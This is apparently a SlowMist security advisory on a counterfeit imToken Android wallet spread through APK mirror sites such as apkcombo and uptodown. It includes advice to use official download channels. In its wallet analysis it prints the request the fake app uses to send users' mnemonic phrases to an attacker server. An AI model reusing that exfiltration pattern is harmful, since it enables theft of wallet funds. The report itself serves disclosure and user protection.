SlowMist: Investigation and Analysis of Third-party Sources of Fake Web3 Wallets

Background

Web3, which is powered by blockchain technology, is spearheading the next phase of the technological revolution, with an increasing number of individuals getting involved in this encryption wave. However, Web3 and Web2 are two distinct worlds, with the former being a dark forest that offers diverse opportunities and risks. In this regard, the wallet serves as the entryway and pass to the Web3 world.

As you explore and interact with various blockchain-related applications and websites in the Web3 world through your wallet, you’ll realize that each application on a public chain uses a wallet to “log in.” This differs from the traditional “login” method in Web2, where accounts between different applications are not interconnected. Conversely, in the Web3 world, all applications employ wallets uniformly for “log in” purposes. Furthermore, when you “connect” to a wallet, it’s not displayed as “Login with Wallet,” but instead as “Connect Wallet.” Essentially, the wallet is the sole means of accessing the Web3 world.

As the saying goes, “where there’s light, there’ll be a shadow.” In this scorching Web3 environment, wallets, as entry-level applications, have naturally become targets of the black and gray industry chain.

Due to various reasons, such as lack of support for Google Play on certain phones or network-related problems, many individuals opt to download Google Play apps from alternative sources, such as apkcombo, apkpure, and other third-party download sites. These sites often assert that their apps are downloaded from the Google Play mirror, but their actual security remains questionable.

Website Analysis

Given the numerous downloading options, let’s take a look at apkcombo as an example. Apkcombo is a third-party app market that claims to offer applications sourced mainly from other legitimate app stores. But is this really the case?

Let’s first look at the traffic volume of apkcombo:

According to the data analytics website, SimilarWeb, apkcombo website ranks:

Global Rank: 1,809
Country Rank: 7,370
Category Rank: 168

We can see that its influence and traffic are both very significant.

Apkcombo provides a default Chrome APK download plugin, which has over 100,000+ users:

So, returning to our focus on the wallet sector in the Web3 field, how secure are the wallet applications downloaded from these sources?

Let’s take the well-known imToken wallet as an example. Its legitimate download channel on Google Play is:
https://play.google.com/store/apps/details?id=im.token.app

Due to certain phones lacking Google Play support or network issues, numerous individuals prefer to download Google Play apps from sources other than the official platform.

The download path for the apkcombo mirror site is: https://apkcombo.com/downloader/#package=im.token.app

The image above reveals that apkcombo offers version 24.9.11, which imToken has verified to be a non-existent version. This confirmation solidifies the fact that this is currently the most widespread fraudulent version of the imToken wallet available.

As of the writing of this article, the imToken wallet’s latest version is 2.11.3, which has a comparatively high version number, potentially utilized to mask itself as the most up-to-date version.

The image below illustrates that this fraudulent wallet version on apkcombo has a substantial download count, which is most probably sourced from Google Play’s download information. In the interest of security, we deem it crucial to expose the origin of this malevolent app to discourage further downloads of this counterfeit wallet.

Meanwhile, we found similar download sites such as: uptodown. Download link: https://imtoken.br.uptodown.com/android

We discovered that on uptodown, anyone can publish apps with minimal cost, therefore making phishing attacks more accessible:

Wallet Analysis

As we have previously examined various cases of counterfeit wallets, including the one reported in “SlowMist: Fake wallet app has stolen millions of dollars from over 10,000 users” published on November 24, 2021, we will refrain from delving into further detail here.

Our analysis will specifically focus on the counterfeit wallet offered by apkcombo, version 24.9.11. During the process of creating or importing a wallet mnemonic on the startup interface, the fake wallet will transmit the mnemonic and other sensitive data to the phishing website’s server, as exemplified in the following image:

According to the reverse APK code and analysis of traffic packets, the method used to send the mnemonic is: https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

As seen in the image below, the earliest “api.funnel.rocks” certificate appeared on June 3, 2022, which is likely when the attack began:

As the saying goes, a picture is worth a thousand words, so here is a flowchart we have created:

Conclusion

Currently, this type of scam is not only active but also expanding in scope, with new victims falling prey to it every day. As users are the weakest link in the security system, they must remain vigilant, enhance their security and risk awareness, and always use official download channels and verify information from multiple sources when using wallets and exchanges. If you have downloaded a wallet from the above-mentioned mirror sites, transfer your assets immediately, uninstall the software, and verify the information through official verification channels if necessary.

To guarantee the safety of your wallet, it is crucial to exclusively use the official websites of renowned wallet applications.

1. imToken：https://token.im/
2. TokenPocket：https://www.tokenpocket.pro/
3. TronLink：https://www.tronlink.org/
4. Bitpie：https://bitpie.com/
5. MetaMask：https://metamask.io/
6. Trust Wallet：https://trustwallet.com/

Continue following the SlowMist Security Team for more Web3 security risk analysis and alerts.

Thanks to @imTokenOfficial for providing official verifiable support during the traceability process.

To protect confidentiality and privacy, this article provides only a brief overview of the issue. SlowMist advises users to increase their understanding of security, improve their capacity to recognize phishing attacks, and refrain from becoming victims of such schemes. To gain more knowledge about security, individuals can refer to the “Blockchain dark forest selfguard handbook” published by SlowMist.

About SlowMist

SlowMist, a prominent blockchain security firm, has been actively engaged in security audits for many years. Security audits not only instill confidence in users but also serve as a means to mitigate the occurrence of attacks. Another challenge in the realm of anti-money laundering work is identifying money laundering syndicates that operate across multiple organizations, which is difficult due to data silos. For project teams, it is vital to block transfers of funds to malicious addresses in a timely manner. The MistTrack Anti-Money Laundering Tracking System has amassed over 200 million address labels and can recognize various wallet addresses used on major trading platforms across the globe, comprising over 1,000 address entities, 100,000 threat intelligence data, and 90 million risk addresses. Interested parties can contact us to access the API. Lastly, we hope to foster collaboration among all stakeholders to create a safer and more secure blockchain ecosystem.